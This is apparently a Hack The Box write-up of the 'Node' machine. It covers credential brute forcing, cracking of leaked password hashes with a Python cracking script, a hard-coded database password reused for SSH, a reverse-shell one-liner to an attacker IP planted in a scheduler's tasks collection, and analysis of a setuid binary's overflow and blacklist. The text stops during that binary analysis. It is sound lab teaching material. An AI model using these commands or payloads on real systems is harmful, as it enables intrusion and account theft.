Node
Ports scan
u505@kali:~/HTB/Machines/Node$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.58
Starting masscan 1.0.5 at 2020-05-15 22:13:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.58
Discovered open port 3000/tcp on 10.10.10.58

u505@kali:~/HTB/Machines/Node$ nmap -sC -sV 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:13 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.31 seconds

u505@kali:~/HTB/Machines/Node$ nmap -sC -sV -Pn 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:15 EDT
Nmap scan report for node.htb (10.10.10.58)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE             VERSION
22/tcp   open  ssh                 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker  Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds

The host drops ICMP, so nmap needs -Pn. Only SSH and port 3000 are open. The "hadoop-tasktracker" label on 3000 is a fingerprint mismatch: the http-title is MyPlace, and the source code recovered later shows it is a Node.js/Express application.
Web Enumeration
The front page (MyPlace) shows three user profiles: tom, mark and rastating.
Dirsearch
u505@kali:~/HTB/Machines/Node$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,js" -r -R 4 -f -t 1000 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://node.htb:3000

Extensions: txt, html, js | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 4

Error Log: /opt/utils/dirsearch/logs/errors-20-05-15_18-35-40.log

Target: http://node.htb:3000

[18:35:40] Starting:
Task Completed

Dirsearch finds nothing because there is nothing for it to tell apart: a few manual requests show that every unknown path returns the same login page, so path enumeration is blind here. The more productive surface is the API that the front-end talks to.
Brute force login page
The error message returned by /api/session/authenticate differs depending on whether the username exists, so the login form enumerates users; it tells us, for instance, that there is no user named admin. With the three known usernames we try rockyou-50 against the JSON login endpoint:

u505@kali:~/HTB/Machines/Node$ cat users.txt
mark
rastating
tom
u505@kali:~/HTB/Machines/Node$ hydra -L users.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.58 -s 3000 http-post-form "/api/session/authenticate:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:{\"success\"\:false}:H=Content-Type\: application/json" -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 16:30:02
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28311 login tries (l:3/p:9437), ~443 tries per task
[DATA] attacking http-post-form://10.10.10.58:3000/api/session/authenticate:{"username"\:"^USER^","password"\:"^PASS^"}:{"success"\:false}:H=Content-Type\: application/json
[3000][http-post-form] host: 10.10.10.58   login: mark   password: snowflake
[STATUS] 17858.00 tries/min, 17858 tries in 00:01h, 10453 to do in 00:01h, 64 active
[3000][http-post-form] host: 10.10.10.58   login: tom   password: spongebob
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 16:31:09

Two of the three passwords are found (mark:snowflake, tom:spongebob), but neither account is an administrator and logging in as them shows nothing new. Note the escaping in the hydra module string: the JSON body contains colons, which are hydra's field separator, so each one has to be written as \:.
User hashes
The profile pages are filled from an API under /api/users/, and each per-user response includes the password hash alongside the username.
Requesting the parent path /api/users/ returns the full user list with hashes and an is_admin flag, which exposes a fourth, administrative account that the front page does not show.
u505@kali:~/HTB/Machines/Node$ curl http://node.htb:3000/api/users/ | python -m json.tool
[
{
"_id": "59a7365b98aa325cc03ee51c",
"is_admin": true,
"password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
"username": "myP14ceAdm1nAcc0uNT"
},
{
"_id": "59a7368398aa325cc03ee51d",
"is_admin": false,
"password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
"username": "tom"
},
{
"_id": "59a7368e98aa325cc03ee51e",
"is_admin": false,
"password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
"username": "mark"
},
{
"_id": "59aa9781cced6f1d1490fce9",
"is_admin": false,
"password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
"username": "rastating"
}
]
We list users and hashes.
u505@kali:~/HTB/Machines/Node$ cat apiuser.hash
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
rastating:5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0
We try to dictionary brute force them.
u505@kali:~/HTB/Machines/Node$ hashid dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Analyzing 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)
hashid cannot tell 256-bit digests apart; plain SHA-256 is by far the most common, so we try hashcat mode 1400 first.
u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...
...
u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester

Three of the four hashes fall to rockyou in seconds; rastating's does not, but the admin password, manchester, is the one that matters. The application stores plain, unsalted SHA-256: a fast hash with no per-user salt, so a single pass over the wordlist tests every account at once (and mark's and tom's results agree with what hydra found).
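As an added example (my own code, not part of the original writeup), the dictionary attack hashcat performs above written out in Python: it runs the four hashes from /api/users/ against a constructed seven-word list standing in for rockyou, and then shows what the application should have stored instead, a salted scrypt hash that has to be attacked one user at a time. The function names and the wordlist are mine; the hashes are the ones printed by the API above.

```python
import hashlib
import hmac
import os

# Hashes copied from the /api/users/ response above (username -> hex SHA-256).
API_HASHES = {
    "myP14ceAdm1nAcc0uNT": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "tom": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "mark": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "rastating": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
}

# Constructed stand-in for rockyou.txt: a few common words plus the real answers.
WORDLIST = ["123456", "password", "snowflake", "manchester", "letmein", "spongebob", "qwerty"]


def crack_unsalted_sha256(hashes, wordlist):
    """Dictionary attack on unsalted SHA-256 (what hashcat -m 1400 does).

    Without a salt every user shares the same hash function, so one digest per
    candidate word is compared against all targets at once: the cost is
    O(words), not O(words * users), and a precomputed table would work too.
    Returns {username: plaintext} for every hash that matched.
    """
    by_digest = {}
    for user, digest in hashes.items():
        by_digest.setdefault(digest.lower(), []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.sha256(word.encode("utf-8")).hexdigest()
        for user in by_digest.get(digest, ()):
            cracked[user] = word
    return cracked


# What the application should have stored instead: a slow, salted KDF.
# n=2**14, r=8, p=1 costs roughly 16 MiB of memory per guess, which is what
# makes wordlist attacks expensive, and the per-user salt removes the
# "one digest checks everybody" shortcut exploited above.
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def hash_password(password, salt=None):
    """Return 'salt_hex$key_hex' with a fresh random 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return salt.hex() + "$" + key.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, key_hex = stored.split("$", 1)
    key = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(key, bytes.fromhex(key_hex))


if __name__ == "__main__":
    for user, word in sorted(crack_unsalted_sha256(API_HASHES, WORDLIST).items()):
        print(f"{user}:{word}")
    stored = hash_password("manchester")
    print("scrypt verify (right/wrong):", verify_password("manchester", stored), verify_password("snowflake", stored))
```

Run stand-alone it prints the same three user:password pairs hashcat recovered; rastating's hash is absent from the mini wordlist, just as it was absent from rockyou.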
Log with admin user
Logging in as myP14ceAdm1nAcc0uNT with manchester gives the same kind of profile page, with one addition: a Download Backup button. It returns a file called myplace.backup.

u505@kali:~/HTB/Machines/Node$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
u505@kali:~/HTB/Machines/Node$ head myplace.backup
UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWTAlv151eAsAAQQAAAAABAAAAABQSwMEFAAJAAgARQEiS0x97zc0EQAAEFMAACEAHAB2YXIvd3d3L215cGxhY2UvcGFja2FnZS1sb2NrLmpzb25VVAkAA9HoqVkwJb9edXgLAAEEAAAAAAQAAAAAgS+Bu1qnEne89oknmXE+3X+Sn7UnLI4PQ9DQ4abEF/C6ytQLOKbSNqVEdn4sgzNcP4tds65V9XBxxs7ZAuAhFHZdvx/BdUxI/8NV+WwWCgU43fR6ZkeEQ9uxY11ezlQ9R0dW4ULw
The content is base64-encoded (UEsDBA is the encoding of the PK\x03\x04 zip signature):
u505@kali:~/HTB/Machines/Node$ cat myplace.backup | base64 -d > myplace.backup.decoded
u505@kali:~/HTB/Machines/Node$ file myplace.backup.decoded
myplace.backup.decoded: Zip archive data, at least v1.0 to extract
u505@kali:~/HTB/Machines/Node$ mv myplace.backup.decoded myplace.backup.decoded.zip
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive: myplace.backup.decoded.zip
creating: var/www/myplace/
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:
The zip file is password-protected. zip2john extracts the hash and john cracks it with rockyou:
u505@kali:~/HTB/Machines/Node$ zip2john myplace.backup.decoded.zip > zip.hash
u505@kali:~/HTB/Machines/Node$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.decoded.zip)
1g 0:00:00:00 DONE (2020-05-15 19:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s sandrad..pigglett
Use the "--show" option to display all of the cracked passwords reliably
Session completed
With the password we unzip the zip file.
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive:  myplace.backup.decoded.zip
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
  inflating: var/www/myplace/node_modules/serve-static/README.md
  inflating: var/www/myplace/node_modules/serve-static/index.js
  inflating: var/www/myplace/node_modules/serve-static/LICENSE
  inflating: var/www/myplace/node_modules/serve-static/HISTORY.md
  inflating: var/www/myplace/node_modules/serve-static/package.json
  inflating: var/www/myplace/node_modules/utils-merge/README.md
  inflating: var/www/myplace/node_modules/utils-merge/index.js
  inflating: var/www/myplace/node_modules/utils-merge/LICENSE
...
Access as mark
u505@kali:~/HTB/Machines/Node/var/www/myplace$ cat app.js
...
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...

app.js connects to MongoDB as mark with a clear-text password, 5AYRft73VtFpc84k, hard-coded in the source (a backup_key sits next to it; it will matter later). Hard-coded credentials are routinely reused, so we try the same password for mark over SSH:
u505@kali:~/HTB/Machines/Node$ ssh mark@node.htb
The authenticity of host 'node.htb (10.10.10.58)' can't be established.
ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'node.htb,10.10.10.58' (ECDSA) to the list of known hosts.
mark@node.htb's password:
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
.-. .-'``(|||) ,`\ \ `-`. 88 88 / \ '``-. ` 88 88 .-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88 (:::) : ___ 88 88 88 88 88 88 88 88 88 88 88 `-` ` , : 88 88 88 88 88 88 88 88 88 88 88 \ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88 `./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888' `-..-( ) `-`
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
Pivot to user Tom
Even before running any enumeration script, a look at the process list shows tom running two Node processes:
mark@node:~$ ps -ef | grep tom
tom 1225 1 0 May15 ? 00:00:35 /usr/bin/node /var/www/myplace/app.js
tom 1240 1 0 May15 ? 00:00:02 /usr/bin/node /var/scheduler/app.js
mark 1602 1557 0 00:56 pts/0 00:00:00 grep --color=auto tom
The first is the public web application; the second is interesting because of its directory name.

mark@node:~$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});

Every 30 seconds the scheduler reads all documents from the tasks collection of the scheduler database, passes each document's cmd field straight to child_process.exec, and deletes the document. It runs as tom but authenticates to MongoDB with mark's credentials, the same ones leaked in the web application's app.js, so anyone holding that password can insert a document and have its command executed as tom.
mark@node:~$ ls -l /var/scheduler/app.js
-rw-rw-r-- 1 root root 910 Sep  3  2017 /var/scheduler/app.js

We cannot modify the program, but we can write to the database it polls:

mark@node:~$ mongo mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
> show collections
tasks
> db.tasks.insertOne({cmd: "touch /tmp/u505"})
{ "acknowledged" : true, "insertedId" : ObjectId("5ebf2e8080c0e28198b78e14") }
> db.tasks.count()
1
A few seconds later the empty file exists, owned by tom:

mark@node:/tmp$ ls -l /tmp/u505
-rw-r--r-- 1 tom tom 0 May 16 01:06 /tmp/u505

and the document has been consumed:

> db.tasks.count()
0

That is command execution as tom. We start a listener:
u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
And insert a new document.
> db.tasks.insertOne({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.34 4444 >/tmp/f"})
{ "acknowledged" : true, "insertedId" : ObjectId("5ebf304c80c0e28198b78e16") }
> db.tasks.count()
1
After a few seconds the shell opens as tom.
u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.58.
Ncat: Connection from 10.10.10.58:49090.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ stty raw -echo
stty raw -echo
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

The id output shows a group named admin with gid 1002. Ubuntu's own groups sit below 1000, so this one was created by hand for the box, and anything owned by it deserves a look.
User flag
As tom we can read the user flag:

tom@node:/$ cd
tom@node:~$ cat user.txt
<USER_FLAG>
Enumeration
Before running any enumeration script, I looked at that admin group:

tom@node:~$ find / -gid 1002 2>/dev/null
/usr/local/bin/backup
tom@node:~$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup

Only one file carries the group, and it is setuid root, executable by root and members of admin (mode rwsr-xr--: other users cannot even read it). That is the privilege-escalation target. We copy it to the attacking machine for closer analysis:

u505@kali:~/HTB/Machines/Node$ scp mark@node.htb:/usr/local/bin/backup ./backupnode
mark@node.htb's password:
backup                                        100%   16KB 207.7KB/s   00:00
Program analysis
The decompiled main of the backup binary and its control-flow graph were shown as screenshots here. The detail that matters is a call to displayTarget, which receives the third command-line argument:

void displayTarget(char *param_1)
{
  char local_200 [508];

  strcpy(local_200,param_1);
  printf(" %s[+]%s Starting archiving %s\n",&DAT_08049359,&DAT_08049340,local_200);
  return;
}

displayTarget is a textbook stack buffer overflow: strcpy copies its argument into the 508-byte local_200 with no length check, and main hands it argv[3] unchanged. An argument longer than the buffer runs over the saved frame pointer and then the return address. Before we get there, however, main performs several checks on the arguments, so we look at those first.
Key file
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[!] Could not open file
As expected, with three arguments the program tries to open a file and compare the second argument with the tokens it contains. The file name is assembled piece by piece with strcpy/strcat, which makes it hard to read in the decompiler, so we run the binary under ltrace and let the library calls reveal the path:

u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 2 3
__libc_start_main(0x80489fd, 4, 0xff9dae54, 0x80492c0 <unfinished ...>
geteuid()                                        = 1000
setuid(1000)                                     = 0
strcmp("1", "-q")                                = 1
puts("\n\n\n ________________"...)               = 69
puts(" / "...)                                   = 67
puts(" | ________________"...)                   = 68
puts(" | | "...)                                 = 68
... (remaining banner puts() calls) ...
puts("`---._.-------------------------"...)      = 82
strncpy(0xff9dad18, "2", 100)                    = 0xff9dad18
strcpy(0xff9dad01, "/")                          = 0xff9dad01
strcpy(0xff9dad0d, "/")                          = 0xff9dad0d
strcpy(0xff9dac97, "/e")                         = 0xff9dac97
strcat("/e", "tc")                               = "/etc"
strcat("/etc", "/m")                             = "/etc/m"
strcat("/etc/m", "yp")                           = "/etc/myp"
strcat("/etc/myp", "la")                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                  = 0
strcpy(0xff9d98e8, "Could not open file\n\n")    = 0xff9d98e8
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Could not open file\n\n") = 37
 [!] Could not open file
exit(1 <no return ...>
+++ exited (status 1) +++

Besides the key path, /etc/myplace/keys, the trace shows that the first argument is only compared with "-q" (presumably a quiet switch) and that the program calls setuid with the value returned by geteuid at startup. On the target, where the binary is setuid root, that makes the real uid root as well, so any process it spawns keeps the privilege.
From the target server:

mark@node:~$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110

The second token is the backup_key hard-coded in the web application's app.js, so it was already in our hands.
Those are the valid tokens. The binary looks for the file at the absolute path /etc/myplace/keys, so we recreate that path on the attacking machine (a symlink to a local copy will do):

u505@kali:~/HTB/Machines/Node$ mkdir -p etc/myplace
u505@kali:~/HTB/Machines/Node$ vi etc/myplace/keys
u505@kali:~/HTB/Machines/Node$ cat etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ sudo ln -s /home/u505/HTB/Machines/Node/etc/myplace /etc/myplace
u505@kali:~/HTB/Machines/Node$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3
[!] Ah-ah-ah! You didn't say the magic word!
Now the program finds the key file and rejects us because the token is wrong. With a token from the file:
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
[+] Validated access token
[+] Starting archiving nofolder
[!] The target path doesn't exist

This time the token is accepted and the program moves on to the third argument, complaining that nofolder does not exist. ltrace again shows what it does with that argument between the two messages.
Not allowed characters
u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
__libc_start_main(0x80489fd, 4, 0xff970c94, 0x80492c0 <unfinished ...>
geteuid()                                                        = 1000
setuid(1000)                                                     = 0
strcmp("1", "-q")                                                = 1
puts("\n\n\n ________________"...)                               = 69
puts(" / "...)                                                   = 67
... (remaining banner puts() calls) ...
puts("`---._.-------------------------"...)                      = 82
strncpy(0xff970b58, "45fac180e9eee72f4fd2d9386ea7033e"..., 100)  = 0xff970b58
strcpy(0xff970b41, "/")                                          = 0xff970b41
strcpy(0xff970b4d, "/")                                          = 0xff970b4d
strcpy(0xff970ad7, "/e")                                         = 0xff970ad7
strcat("/e", "tc")                                               = "/etc"
strcat("/etc", "/m")                                             = "/etc/m"
strcat("/etc/m", "yp")                                           = "/etc/myp"
strcat("/etc/myp", "la")                                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                                  = 0x97d25b0
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x97d25b0)    = 0xff9706ef
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n")             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x97d25b0)    = 0xff9706ef
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n")             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
strcpy(0xff96f728, "Validated access token")                     = 0xff96f728
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Validated access token") = 38
 [+] Validated access token
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0)    = 0xff9706ef
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n")             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0)    = 0
strstr("nofolder", "..")                                         = nil
strstr("nofolder", "/root")                                      = nil
strchr("nofolder", ';')                                          = nil
strchr("nofolder", '&')                                          = nil
strchr("nofolder", '`')                                          = nil
strchr("nofolder", '$')                                          = nil
strchr("nofolder", '|')                                          = nil
strstr("nofolder", "//")                                         = nil
strcmp("nofolder", "/")                                          = 1
strstr("nofolder", "/etc")                                       = nil
strcpy(0xff96f91c, "nofolder")                                   = 0xff96f91c
printf(" %s[+]%s Starting archiving %s\n", "\033[32m", "\033[37m", "nofolder") = 43
 [+] Starting archiving nofolder
strcpy(0xff9704fb, "nofolder")                                   = 0xff9704fb
getpid()                                                         = 8639
time(0)                                                          = 1590009614
clock(0, 0, 0, 0)                                                = 3247
srand(0x5e3d042d, 0x7243d4de, 0x5e3d042d, 0x804918c)             = 0
rand(0, 0, 0, 0)                                                 = 0x6a7838b2
sprintf("/tmp/.backup_1786263730", "/tmp/.backup_%i", 1786263730) = 23
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1786263730", "nofolder") = 73
system("/usr/bin/zip -r -P magicword /tm"... <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                           = 3072
access("/tmp/.backup_1786263730", 0)                             = -1
strcpy(0xff96f728, "The target path doesn't exist")              = 0xff96f728
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "The target path doesn't exist") = 45
 [!] The target path doesn't exist
puts("\n")                                                       = 2
remove("/tmp/.backup_1786263730")                                = -1
fclose(0x97d25b0)                                                = 0
+++ exited (status 0) +++

The trace tells the whole story. The second argument is compared with each line of /etc/myplace/keys (the loop keeps reading after a match, which is harmless). The third argument is then run through a short blacklist: it may not be exactly "/" (a strcmp, so this is an equality test, not a prefix test), and it may not contain any of
- ..
- /root
- ;
- &
- `
- $
- |
- //
- /etc

Nothing else is checked. The value is then copied with strcpy (the call inside displayTarget) and pasted, unquoted, into the shell command /usr/bin/zip -r -P magicword /tmp/.backup_<rand> <path>, which runs through system(); the password is the same magicword that protected the first backup. Finally access() checks whether the archive was created. For a path that does not exist zip produces nothing, hence "The target path doesn't exist".

Requesting a path the blacklist catches, for example /root/, does not produce an error:
u505@kali:~/HTB/Machines/Node$ ./backupnode abc a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root/
[+] Validated access token
[+] Finished! Encoded backup is below:
